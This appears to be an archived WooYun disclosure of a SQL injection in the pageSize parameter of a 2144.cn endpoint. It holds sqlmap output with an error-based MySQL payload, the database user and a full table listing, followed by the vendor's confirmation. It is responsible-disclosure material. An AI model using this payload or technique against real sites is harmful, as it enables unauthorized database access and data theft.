乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
欢迎入住乌云!
http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=1&t=0.09775325423106551参数pageSize
---Parameter: pageSize (GET) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: byMonth=0&cid=1&page=1&pageSize=1 PROCEDURE ANALYSE(EXTRACTVALUE(2485,CONCAT(0x5c,0x71787a6271,(SELECT (CASE WHEN (2485=2485) THEN 1 ELSE 0 END)),0x717a717071)),1)&t=0.09775325423106551---back-end DBMS: MySQL 5.1sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: pageSize (GET) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: byMonth=0&cid=1&page=1&pageSize=1 PROCEDURE ANALYSE(EXTRACTVALUE(2485,CONCAT(0x5c,0x71787a6271,(SELECT (CASE WHEN (2485=2485) THEN 1 ELSE 0 END)),0x717a717071)),1)&t=0.09775325423106551---back-end DBMS: MySQL 5.1current user: '[email protected].%'current user is DBA: Falseavailable databases [3]:[*] app_2144_cn[*] information_schema[*] testDatabase: app_2144_cn[61 tables]+-------------------+| c_user || c_vote_log || c_vote_log_0 || c_vote_log_1 || c_vote_log_10 || c_vote_log_11 || c_vote_log_12 || c_vote_log_13 || c_vote_log_14 || c_vote_log_15 || c_vote_log_2 || c_vote_log_3 || c_vote_log_4 || c_vote_log_5 || c_vote_log_6 || c_vote_log_7 || c_vote_log_8 || c_vote_log_9 || c_vote_options || c_vote_question || feedback || flash_flash || flash_girl || flash_girls_new || girls_nav || keyword || keywordview || link_category || link_element || migration || t_admin || t_category || t_comment || t_comment_0 || t_comment_1 || t_comment_2 || t_comment_3 || t_comment_4 || t_comment_5 || t_comment_6 || t_comment_7 || t_comment_8 || t_comment_9 || t_comment_a || t_comment_b || t_comment_c || t_comment_d || t_comment_e || t_comment_f || t_comment_new || t_comment_newbk || t_comment_operate || t_flower_switch || t_log || t_operate || t_photo || t_photo_cache || t_photo_cache_bak || t_photo_girl || t_session || t_stat |+-------------------+
这接口要不要设置下访问权限呢?
危害等级:低
漏洞Rank:5
确认时间:2015-07-09 11:07
非常感谢您对2144游戏网安全工作的支持!
暂无